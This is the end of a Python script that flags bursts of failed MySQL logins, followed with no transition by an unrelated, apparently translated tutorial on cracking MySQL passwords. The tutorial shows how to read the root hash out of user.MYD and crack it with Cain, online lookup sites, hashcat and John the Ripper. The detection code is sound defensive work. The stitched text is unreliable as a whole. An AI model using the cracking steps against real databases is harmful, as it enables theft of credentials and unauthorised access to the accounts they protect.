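        while recent and ts - recent[0] > window:
            recent.popleft()
        if len(recent) < threshold:
            alerted.discard(host)
        if denied:
            recent.append(ts)
            if len(recent) >= threshold and host not in alerted:
                alerted.add(host)
                alerts.append(("failure_burst", host, len(recent)))
        else:
            # A login that succeeds right after a burst deserves the
            # highest priority: the guessing (or the bypass) worked.
            if len(recent) >= threshold:
                alerts.append(("success_after_failures", host, len(recent)))
            recent.clear()
            alerted.discard(host)
    return alerts


def build_sample():
    """Constructed log: one normal login, one burst that ends in a
    successful login, and one user who mistypes a password twice."""
    base = datetime(2024, 1, 10, 9, 0, 0)

    def stamp(seconds):
        return (base + timedelta(seconds=seconds)).strftime(TS_FMT)

    lines = [f"{stamp(0)} 11 Connect app@10.0.0.5 on shop using TCP/IP"]
    lines += [
        f"{stamp(i)} {20 + i} Connect Access denied for user "
        f"'root'@'192.168.0.77' (using password: YES)"
        for i in range(1, 13)
    ]
    lines.append(f"{stamp(13)} 40 Connect root@192.168.0.77 on mysql using TCP/IP")
    lines += [
        f"{stamp(20 + i)} {50 + i} Connect Access denied for user "
        f"'dev'@'10.0.0.9' (using password: YES)"
        for i in range(2)
    ]
    lines.append(f"{stamp(23)} 60 Connect dev@10.0.0.9 on shop using TCP/IP")
    return lines


if __name__ == "__main__":
    for alert in detect(build_sample()):
        print(alert)
```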
Mysql password cracking
A. Cain tool decrypts mysql password
Use the UltraEdit-32 editor to open the user.MYD file directly and view it in binary mode. There is a string after the root user; select it and copy it to Notepad. For example, 506d1427f6f61696b4501445c90624897266dae3.
Note:
(1) Do not copy “” after root into the string.
(2) In some cases you need to look further back, otherwise you won't get the full MYSQLSHA1 password, which is 40 digits.
Install the Cain tool, open the cracker, right-click "Add to list" to add the MySQL hashes to the crack list, then crack them with a dictionary, brute force, and so on.
B. Online password cracking
1. http://cmd5.com. Query the obtained MySQL value on the cmd5.com website. MySQL passwords are generally charged.
2. http://somd5.com. somd5.com is a free cracking site that appeared later. Each crack requires manually solving a graphic verification code. It is fast and works well, but only one hash can be cracked at a time, and the verification code must be entered again after each crack.
C. Oclhash
Hashcat supports a variety of cracking algorithms and is free open source software. Official website: hashcat.net/hashcat/, cracking…
hashcat64.exe -m 200 myql.hash pass.dict // crack MySQL323
hashcat64.exe -m 300 myql.hash pass.dict // crack MySQL4.1/MySQL5
D. John the Ripper password cracker
John the Ripper download address: www.openwall.com/john/h/john… John the Ripper can crack passwords in many formats in addition to Linux passwords.
echo 81f5e21e35407d884a6cd4a731aebfb6af209e1b > hashes.txt
john --format=mysql-sha1 hashes.txt
john --list=formats | grep mysql // check the algorithms that support MySQL password cracking
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.